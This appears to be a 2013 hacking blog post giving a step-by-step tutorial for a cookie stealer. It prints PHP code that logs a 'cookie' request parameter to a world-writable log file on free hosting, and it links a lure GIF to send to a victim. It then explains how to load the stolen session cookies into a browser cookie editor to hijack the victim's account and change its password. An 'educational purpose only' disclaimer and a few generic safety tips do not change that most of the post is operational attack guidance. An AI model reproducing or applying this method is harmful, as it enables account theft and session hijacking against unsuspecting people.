Tuesday, January 29, 2013

What is Cookie Logger Or Cookie Stealer?

Hi Guys... This is DJ Alone... as Per I Promised That i Will Post Cookie Logger / Cookie Stealer Tutorial...Here is This Tutorial For You...

First Of All Let Me Say Clearly... I'm Not Encourging U TO Do This...

Note :- This Tutorial is For Education Purpose Only... & Its For Better Security For Ur Self...

Now Let's Move To The Topic...


What is Cookie Logger / Cookie Stealer ???


A Cookie Logger Or Cookie Stealer is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim...

So, Today I Will Help U Guys in Making Ur Own Cookie Logger...So , Enjoy...

Step 1 :- Download The Script From Below Link and Rename it To Alone.GIF  (what ever u wanna save)...

http://www.mediafire.com/?s13y1lrpx8hc6h0

Step 2 :- Then Copy The Following Script Into NotePad & Save It As CookieLogger.PHP  (whatever u wanna save)...


$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3 :- Create a New Text File & Save it As logfile.txt

Step 4 :- Now Upload The Following Files To Ur Hosting Site... Like 000WebHost Or MY3GB...


cookielogger.php :- http://www.t3chnohacker.blogspot.com/cookielogger.php

logfile.txt :- http://www.www.t3chnohacker.blogspot.com/logfile.txt (chmod 777)

Alone.gif :- http://www.t3chnohacker.blogspot.com/alone.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://my3gb.com
http://000webhost.com

* Rename T3chno Hacker To Ur Website...

Step 5 :- Now Ur Cookie Logger / Cookie Stealer  is Ready To Be Used... Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them...

Note :- Give Ur Victim The Link Of GIF File...

Step 6 :- If Ur Victim Clicks On Ur Link U Will Get His / Her Cookies...and That Cookies Will Stored In Ur Website's logfile.txt... So, The Cookie Will Looks Like Below...


u_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 
u_sid=3bd7bdcb4e9e41737ed6eb41c43a4ec9



Step 7 :- Now All U Need To Do Is... Remove Ur Cookies Or Replace The Above Cookies With Ur Own Cookies... And Boom... Congrats U Will Succesfully Logged In To Ur Victim's Account...

Note :- Use Mozilla FireFox For This... And Use Cookie Editor ADD-ON in FireFox For Editing Cookies in Mozilla...

Step 8 :- 
For getting the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie...You can use a Cookie Editor for this...
The string before “=” is the name of the cookie and the string after “=” is its value...
So Change the values of the cookies in the cookie Editor...



Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session...
So if the Victim clicks on Logout you will also Logout automatically...
but once you have changed the password then you can again login with the new password... but the victim would not be able to login with it...

MUST READ :- I don’t take any responsibility for what you do with this script...Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

Don't Click On Any Links Given By Anyone...
Use Secure Connection Security In Facebook...
Use Login Notifications For Better Security...

Don't Click On SPAM Links Videos Or Pics...

Never Ever Try RATS or KeyLoggers...

Be Safe...Don't Use Any Softwares For Hacking...Coz All Are Fakes...

Hacking is Not Playing With SomeOne's Account... 

Real Hacking is Much More Than It...


All The Hackers are Not Same... We are Humans & We Had Heart Also...

So, Wake Up Fast... With The New Techys...

DJ Alone...





1 comments: